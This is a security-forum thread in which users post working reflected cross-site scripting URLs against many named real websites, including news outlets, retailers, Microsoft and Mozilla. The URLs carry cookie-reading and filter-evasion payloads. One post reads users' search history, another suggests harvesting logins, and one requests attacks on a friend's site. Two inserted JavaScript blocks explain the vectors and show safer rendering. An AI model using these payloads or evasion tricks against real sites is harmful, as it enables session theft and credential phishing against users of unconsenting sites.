Re: So it begins
Posted by: tx
Date: July 21, 2007 12:36AM

Kind of a cool fragmented XSS thing here. The searchword variable is limited to 20 characters; the searchphrase variable isn't limited (afaik) but ' is escaped as \', hence fragmenting: http://demo.joomla.org/demo10/index.php?searchword=%27%3B/*&searchphrase=*/alert%28document.cookie%29%3B//&option=com_search

alerts from the <select> (name=limit class=inputbox) box when the onchange event occurs.
Affects Joomla 1.0.* (current is 1.0.12)

-tx @ lowtech-labs.org



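The mechanics of the fragmented vector above, as an added example in JavaScript (not code from the post and not Joomla's own template): a hypothetical page reflects two query parameters into one inline onchange handler, with the only defences the post describes (a 20-character cap on searchword, quote escaping on searchphrase). Each fragment is harmless alone; a `/* ... */` comment bridges the markup between them. A hardened renderer is shown beside it, and both handlers are executed against a stubbed document to see whether alert fires.

```javascript
// Added example: models the fragmented XSS described in the post.
// The <select> markup and the two "defences" are assumptions, not Joomla's code.

// PHP-style addslashes(): the only treatment assumed for searchphrase.
function addslashes(s) {
  return s.replace(/\\/g, '\\\\').replace(/'/g, "\\'").replace(/"/g, '\\"');
}

// Hypothetical vulnerable rendering: searchword is merely truncated to 20
// characters, searchphrase has its quotes escaped, and both land inside a
// single-quoted JS string in the onchange attribute.
function renderVulnerable(searchword, searchphrase) {
  const word = searchword.slice(0, 20);      // length cap only, no escaping
  const phrase = addslashes(searchphrase);   // quotes escaped, nothing else
  return '<select name="limit" class="inputbox" onchange="' +
    "document.location='index.php?option=com_search&searchword=" + word +
    "&searchphrase=" + phrase + "'\">";
}

// Hardened rendering: URL-encode each value, emit the URL as a JSON string
// literal (no unescaped quote or backslash can break out), then HTML-escape
// the whole attribute so the markup context cannot be broken either.
function htmlAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}
function renderHardened(searchword, searchphrase) {
  const url = 'index.php?option=com_search&searchword=' +
    encodeURIComponent(searchword.slice(0, 20)) +
    '&searchphrase=' + encodeURIComponent(searchphrase);
  const js = 'document.location=' + JSON.stringify(url);
  return '<select name="limit" class="inputbox" onchange="' + htmlAttr(js) + '">';
}

// Recover the handler as a browser would: attribute value, entities decoded.
function extractHandler(html) {
  const m = /onchange="([^"]*)"/.exec(html);
  return m[1].replace(/&quot;/g, '"').replace(/&lt;/g, '<')
             .replace(/&gt;/g, '>').replace(/&amp;/g, '&');
}

// Execute the handler with a stubbed document and alert; report what happened.
function fires(handler) {
  const calls = [];
  const doc = { cookie: 'session=deadbeef', location: '' };   // constructed stub
  try {
    new Function('document', 'alert', handler)(doc, (x) => calls.push(String(x)));
  } catch (e) {
    return { alerted: false, error: e.message };
  }
  return { alerted: calls.includes('session=deadbeef'), location: doc.location };
}

// The two fragments from the post: searchword closes the string and opens a
// comment; searchphrase closes the comment, runs code, and comments out the rest.
const SEARCHWORD = "';/*";
const SEARCHPHRASE = "*/alert(document.cookie);//";

function demo() {
  return {
    vulnerable: fires(extractHandler(renderVulnerable(SEARCHWORD, SEARCHPHRASE))),
    hardened: fires(extractHandler(renderHardened(SEARCHWORD, SEARCHPHRASE))),
  };
}
```

In the vulnerable rendering the handler becomes `document.location='...searchword=';/*&searchphrase=*/alert(document.cookie);//'`, which is valid JavaScript: the first statement sets the location, the comment swallows the `&searchphrase=` glue, and the alert runs. Neither defence fires because the payload contains no quote and the quote-bearing fragment is under the length cap. The hardened version keeps both values inside one string literal, so the same input is just data.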

Re: So it begins
Posted by: nav
Date: July 21, 2007 03:21PM

station.sony.com


[www.station.sony.com]

Re: So it begins
Posted by: tx
Date: July 28, 2007 08:11PM

http://www.timesonline.co.uk/tol/sitesearch.do?query=%22;alert('xss');//&hitsperpage=10&jumpToPrevious=0&mode=SIMPLE&nextOffset=0&offset=0&leftStartIndex=1&leftEndIndex=10&jumpToPrevious=0&mode=SIMPLE&submitStatus=searchFormSubmitted&sectionId=2820&x=0&y=0

http://publish.vx.roo.com/thedaily/videoplayer/?channel=Movies&clipid=%27%3Balert%28%27xss%27%29%3B//

http://www.nypost.com/search/search.htm?q=%3Cscript%3Ealert('xss');%3C/script%3E&s=news&t=0

http://online.wsj.com/public/search/page/3_0466.html?KEYWORDS=%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E%3C!--&imageField.x=0&imageField.y=0

http://search2.foxnews.com/search?ie=UTF-8&oe=UTF-8&client=my_frontend&proxystylesheet=my_frontend&output=xml_no_dtd&site=story&getfields=*&filter=0&sort=date:D:S:d1&q=%3C/script%3E%3Cscript%3Ealert('xss');%3C/script%3E

-tx @ lowtech-labs.org




Re: So it begins
Posted by: tx
Date: August 02, 2007 12:25PM

Pownce.com: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://pownce.com/forgot/&email=%3Cscript%3Ealert('xss')%3B%3C%2Fscript%3E

-tx @ lowtech-labs.org

Re: So it begins
Posted by: tx
Date: August 14, 2007 03:45AM

more ethicalhacker.net (this is still not fixed btw http://sla.ckers.org/forum/read.php?3,44,12928#msg-12928):

had to do a little evasion for the filter and mod_rewrite stuff
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54'%22%3E%3Cscript%08%3Ealert(%22xss%22)%3C/script%08%3E/script%3E,666/topic,1584.0/

-tx @ lowtech-labs.org




Re: So it begins
Posted by: tx
Date: August 16, 2007 12:54PM

http://list.research.microsoft.com/scripts/lyris.pl?enter=%3Cimg%20src%20onerror=%22alert('xss');%22%3E&text_mode=&lang=english

-tx @ lowtech-labs.org

Re: So it begins
Posted by: tx
Date: August 21, 2007 02:39PM

http://blog.meebo.com/?year=%3C/title%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

http://k2.gamespress.com/search.asp?x=-1&string=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3C!&orig=Search%2bpress%2bcenter&subject=&publisher=&date=&search=-1

EDIT:
http://www.ooorgle.com/component/option,com_remository/Itemid,36%22%3E%3Cscript%08%3Ealert(%22xss%22)%3C/script%08%3E/script%3E,666
http://www.ooorgle.com/component/option,com_remository/Itemid,36/func,select/id,4%22%3E%3Cscript%08%3Ealert(%22xss%22)%3C/script%08%3E/script%3E,666

-tx @ lowtech-labs.org




Re: So it begins
Posted by: Spyware
Date: August 21, 2007 04:39PM

http://www.washington.org/index.cfm?blnNavView=True&idContentType=429&idCurrentPage='%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Re: So it begins
Posted by: Kyran
Date: August 21, 2007 11:10PM

http://www.download.com/sort/3140-2001_4-0-1-3.html?gfiletype=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

- Kyran

Re: So it begins
Posted by: Kyran
Date: August 21, 2007 11:23PM

http://www.amazon.com/gp/daily/ref=%22/%3E%3Cscript%3Ealert('XSS%20$4.99%20+%20S&H')%3C/script%3E

- Kyran

Re: So it begins
Posted by: tx
Date: August 22, 2007 04:16PM

http://www.asmallworld.net/publicpages/jobs.php?seltab=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%3C/script%3E%5D%21%3E%3C%21%5B

-tx @ lowtech-labs.org

Re: So it begins
Posted by: wrayal
Date: August 22, 2007 05:14PM

http://mystuff.ask.com/mysearch/DisplaySearchesHome?sort=%22%29%7D%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3C%2F%73%63%72%69%70%74%3E&t=images

(script src tags +
xmlhttp = new XMLHttpRequest();xmlhttp.open("GET"," http://mystuff.ask.com/mysearch/DisplaySearchesHome?t=history&sort=dedate",true);xmlhttp.onreadystatechange=function() {if (xmlhttp.readyState==4) {mine=(xmlhttp.responseText);parse()}};xmlhttp.send(null)
for the most 'fun')

Re: So it begins
Posted by: wrayal
Date: August 22, 2007 05:19PM

http://www.search.org/search/default.asp?yider=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

http://www.brainboost.com/search.asp?Q=%22%3E%3C%2Ftitle%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&Submit=ask
[3-in-1 - each alert is actually a separately exploited flaw]

[edit to remove previously found exploits]




Re: So it begins
Posted by: tx
Date: August 22, 2007 05:51PM

@wrayal: Please be sure to do a search before submitting. Both the search.lycos.com and www.hotbot.com issues have already been disclosed in this thread.

-tx @ lowtech-labs.org

Re: So it begins
Posted by: ma1
Date: August 25, 2007 04:55AM

Ministry of External Affairs, India

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: So it begins
Posted by: FiSh
Date: August 25, 2007 12:54PM

Here's a bunch at once...

http://playwithyourmind.com/online-games.php?category=%3Cscript%3Ealert(1)%3C/script%3E
http://shoplinc.com/search.php?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://www.tasteofnovascotia.com/recipe_directory/search.php?letter=%3Cscript%3Ealert(1)%3C/script%3E
http://www.webmarketinfo.com/search.php?q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://bondagegirls.org/1/search.php?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://sierraactivist.org/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://rpms.mandrivaclub.com/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.suche4free.de/search.php?query=%22%3E%3Cscript%3Ealert%2814444324224%29%3C%2Fscript%3E
http://www.diyzone.net/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.popcultureshock.com/timm/search.php?query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.xtra-ppc.com/search.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://google.pocetnastrana.com/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.s-it.lt/search/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.roxter.pl/search.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&region=1&page=
http://www.search.bg/search.php?query=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&x=0&y=0
http://api.cakephp.org/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://trailfire.com/pages/search.php?q=%3Cscript%3Ealert(1)%3C/script%3E
http://xmlsoft.org/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://hledani.tiscali.cz/news/search.php?query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.iconcrawler.com/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://mskd.ru/isearch.php?query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.notefish.com/search.php?st=tag&query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.searchsystems.net/search.php?SEARCH=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&TYPE=2&LIMIT=25
http://www.egosurf.org/search.php?search=%3Cscript%3Ealert(1)%3C/script%3E
http://www.eed.usv.ro/news/search.php?query=%22%3E%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Dhttp%3A//google.com%22%3E
http://www.luckyscafe.com/search.php?query=%22%3E%22%3E%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Dhttp%3A//google.com%22%3E
http://www.myspacelayoutspy.com/search.php?cat=car&query=%3Cscript%3Ealert(1)%3C/script%3E
http://minkaku.goga.co.jp/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.theknowledge-brokers.com/find/search.php?type=or&search=1&results=20&query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.researchsea.com/html/experts.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.p2gems.org/index.php?action=search&search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://search.jongo.com/searchAll.php?keyword=%3Cscript%3Ealert(1)%3C/script%3E
http://www.franksicons.com/search.php?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://www.electionguide.org/news-search.php?country=125&year=any&keyword=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submitted=1&submit.x=0&submit.y=0&submit=Search
http://www.noah-health.org/search/results.php?keyword=%3Cscript%3Ealert(1)%3C/script%3E
http://www.ajfca.org/gallery/search.php?keyword=%3Cscript%3Ealert(1)%3C/script%3E
http://www.uoresources.com/search.php?search_term=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&shard=Atlantic
http://win-big-prizes.com/search.php?q=%3Cscript%3Ealert(1)%3C/script%3E
http://searchnetfast.info/webtrue/search.php?q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://netinfofirst.info/inftrue/search.php?q=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
http://meganetsearch.info/infsite/search.php?q=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
http://www.surfnetkids.com/related.php?t=%3Cscript%3Ealert(1)%3C/script%3E&c=/wordsearch.htm
http://www.podcastdirectory.com/search/showword.php?search=%3Cscript%3Ealert(1)%3C/script%3E
http://www.drugs.com/search.php?searchterm=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&is_main_search=1
http://www.girmantas.com/photogallery/search.php?keyword=%3Cscript%3Ealert(1)%3C/script%3E
http://www.richardhumphrys.com.au/stock/search.php?keyword=%3Cscript%3Ealert(1)%3C/script%3E
http://qwsa.biz/search.php?q=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
http://www.searchmechanism.com/search/search.php?said=1973&sbox=1&qq=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=Start+Search+Mechanism
http://www.gvla.org/search.php?q=%3Cscript%3Ealert(1)%3C/script%3E
http://www.lufee.com/lufee.php?f=lumrix-search&v=&lufee=&k=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://www.dreamwork.eu/index.php?s=%3Cscript%3Ealert(1)%3C/script%3E
http://www.chcf.org/error/index.cfm?eurl=%3Cscript%3Ealert(1)%3C/script%3E
http://www.searchsystems.net/search.php?SEARCH=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&TYPE=2&LIMIT=25
http://www.synergymx.com/search.php?q=%3Cscript%3Ealert(1)%3C/script%3E
http://alvares.name/searchform.php?msg=%3Cscript%3Ealert(1)%3C/script%3E
http://smartphone.mobiletopsoft.com/search.php?querywords=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.foreclosuredataonline.com/listings.php?county='%3Cscript%3Ealert(1)%3C/script%3E
http://www.spinblessing.com/search.php?Query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.edrugsearch.com/web.php?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&d=&qty=
http://www.dalbani.co.uk/search.php?case=prefix&by=name&limit=25&q=%3Cscript%3Ealert(1)%3C/script%3E
http://www.deborahrenshaw.com/search.php?q=%3Cscript%3Ealert(1)%3C/script%3E
http://www.geometry.net/cgi-bin/988.cgi?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://seekxml.com/search.php?query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.oeffa.org/alphasearch.php?alpha=%3Cscript%3Ealert(1)%3C/script%3E
http://www.beinggirl.co.in/main/re_searchrestest.php?search=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.top40-charts.com/pedia.php?title=Special:Search/%3Cscript%3Ealert(1)%3C/script%3E
http://www.olshan.com/search.php?str=%3Cscript%3Ealert(1)%3C/script%3E
http://www.foreclosure1.com/lview.php?county_name=%3Cscript%3Ealert(1)%3C/script%3E
http://julian.hoosierroots.com/search.php?surname=%3Cscript%3Ealert(1)%3C/script%3E&lnqualify=equals&mybool=AND
http://www.dorilynterrace.com/search.php?search=%3Cscript%3Ealert(1)%3C/script%3E
http://www.stga.co.uk/search.php?language=-1&region=-1&name=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=Search+for+guides

13337.org

Re: So it begins
Posted by: tx
Date: August 28, 2007 09:17PM

http://www.lexisnexis.com/search/Results1.asp?redirect&s=1&target=%0a%0d%3Cscript%3Ealert%28%27xss%27%29%3B%3C/script%3E

http://www.lexisnexis.com/search/Results1.asp?datasections=&query=<script>alert('xss');</script>&Go.x=0&Go.y=0&Go=Get+Answers
Javascript only executes once the user follows one of the Category links on the left.

-tx @ lowtech-labs.org

Re: So it begins
Date: August 28, 2007 10:13PM

Didn't they have a breach, and the FTC sued them? or was that card systems that got sued by them? If so you would think they would be more security aware by now.

Re: So it begins
Posted by: DoctorDan
Date: August 29, 2007 11:50PM

Oh, this is glorious- gave me a laugh at least =P
This one's for you, RSnake... you can probably guess: http://www.bordersstores.com/search/title_detail.jsp?id=56783606&srchTerms=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cx%20x=%22&mediaType=1&srchType=Keyword

-Dan




Re: So it begins
Posted by: skpx
Date: September 01, 2007 08:11AM

hxxp://econ.worldbank.org/external/default/main?menuPK=51515855&pagePK=64256479&piPK=64165424&q='"><script>alert('x')</script>&theSitePK=469372
[www.youare.tv]

- site also allows javascript in your profile: [www.youare.tv]

I am just learning this XSS stuff, so there is probably a lot more you could do with this.




Re: So it begins
Posted by: tx
Date: September 03, 2007 05:06PM

Another fragmented vector for Joomla (I'd demonstrate it on demo.joomla.org, but they took it down when it got pwned.)
http://www.salvagedata.com/index.php?option=com_search&Itemid=248&searchword=%22%3E%3C%21%5B&submit=Search&searchphrase=any&ordering=%5D%21%3E%3Cscript%09%3Ealert%28%27xss%27%29%3B%3C/script%3E%3C%21

-tx @ lowtech-labs.org



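The vector above carries a tab inside the tag (`%3Cscript%09%3E` decodes to `<script` followed by a tab and `>`), a pattern that gets past filters looking for the literal `<script>` token. As an added example in JavaScript (not from the post; the blacklist below is a hypothetical stand-in, since the target's actual filter is not shown), this models the tag-name rule of the HTML tokenizer beside such a filter and compares what each one sees. Per the HTML tokenizer, a tag name ends at a tab, line feed, form feed, space, `/` or `>`, so a tab after `script` still yields a script tag; the backspace used in earlier posts is not a name terminator under the current spec and relied on looser browsers of the time, so it is not claimed here.

```javascript
// Added example: literal-token blacklist versus the HTML tag-name rule.
// The filter is a hypothetical stand-in for a 2007-era "<script>" blacklist.

function naiveFilterBlocks(html) {
  return /<script>|<\/script>/i.test(html);   // exact token match only
}

// Tag-name rule: "<" (optionally "/") then an ASCII letter starts a tag; the
// name runs until tab, LF, FF, space, "/" or ">". Everything up to that
// terminator is the (case-insensitive) tag name.
function tagNames(html) {
  const names = [];
  const re = /<(\/?)([a-zA-Z][^\t\n\f \/>]*)/g;
  let m;
  while ((m = re.exec(html)) !== null) {
    names.push((m[1] ? '/' : '') + m[2].toLowerCase());
  }
  return names;
}

function containsScriptTag(html) {
  return tagNames(html).includes('script');
}

// Decode the URL-encoded form the post used (%09 is a tab), then report the
// filter's verdict next to the parser's view of the same bytes.
function analyse(encoded) {
  const html = decodeURIComponent(encoded);
  return {
    filterBlocks: naiveFilterBlocks(html),
    parserSeesScript: containsScriptTag(html),
    tags: tagNames(html),
  };
}

// Constructed inputs: the plain tag and the tab-separated variant from the post.
const PLAIN = '%3Cscript%3Ealert(1)%3C/script%3E';
const TABBED = '%3Cscript%09%3Ealert(%27xss%27)%3B%3C/script%09%3E';
```

`analyse(PLAIN)` is blocked by the filter and seen as a script tag by the parser; `analyse(TABBED)` passes the filter while the parser still reports a `script` start and end tag. The practical lesson is the usual one: encode on output for the context (HTML body, attribute, JS string) rather than trying to enumerate bad tokens, because the parser's tokenisation rules, not the filter's regex, decide what executes.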

Re: So it begins
Posted by: Spyware
Date: September 04, 2007 07:08AM

http://www.zonealarm.com/store/content/catalog/products/sku_list_zaas.jsp;jsessionid=GdKmp20qkkLsvx8EpnK1zpyCKN3yl8KWSfXK0Er2X7fKYXT244OF!-82891113!-1062696904!7551!7552!NONE?dc=34std&ctry=&lang=<script>alert('boo')</script>

Hope this wasn't posted before.

Small joke: I made that XSS in the "Spyware protection" area of the site.

Re: So it begins
Posted by: wrayal
Date: September 05, 2007 07:46AM

http://www.thelink.co.uk/index.php?page=searchresult&sTypeSearch=searchMobile&search_universe=1&aSearchCritere=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

The exploited variable has a limit to its length (39 I believe). But...the site has a login page. Use XSS + an external script and you fish out a lot of usernames and passwords.

Re: So it begins
Posted by: nav
Date: September 06, 2007 05:53PM

So I emailed mozilla customer service with an XSS hole, and this was their response.
Mozilla store XSS

--------------------------------------------------------------------------------

Sent: 9/1/2007
To: Customer Service
Subject: Re: General

Hi, I thought you would like to know there is a cross site scripting
vulnerability in your webstore. The code parameter is not sanitized before
being used on the page. Reference my example. Please contact me and let me
know how you deal with these issues.
http://store.mozilla.org/product.php?code=mz1303223%22%3E%3Cscript%3Ealert(1)%3C/script%3E&catid=&offset=0

RESPONSE:

Dear ,

Thank you for your inquiry. From the message that was received, I was not able
to discern your question. Please reply to this message with your concern, or
you can reach me by phone at 888-738-4300.

Best Regards,

Tia Vandersnick
Customer Service
GatewayCDI
909 North 20th Street
Saint Louis, MO 63106
314-535-1888 ext. 301
tia.vandersnick@gatewaycdi.com
www.gatewaycdi.com
BUILD YOUR BRAND

Re: So it begins
Posted by: Spyware
Date: September 07, 2007 09:58AM

You forgot to add question marks. Most people don't need those to derive questions from a sentence, but some people aren't that... dynamic.

Your xss is fixed though.

Re: So it begins
Posted by: Reiners
Date: September 08, 2007 08:32PM

http://www.aimpages.com/.resource/pictures?t=accountname&id=';alert(document.cookie);x='s

(you don't have to replace "accountname")

Re: So it begins
Posted by: krazl
Date: September 09, 2007 11:31PM

I need an expert here to find an XSS flaw in my friend's website, www.stonemaster.biz. Please fully disclose here. Thanks in advance.
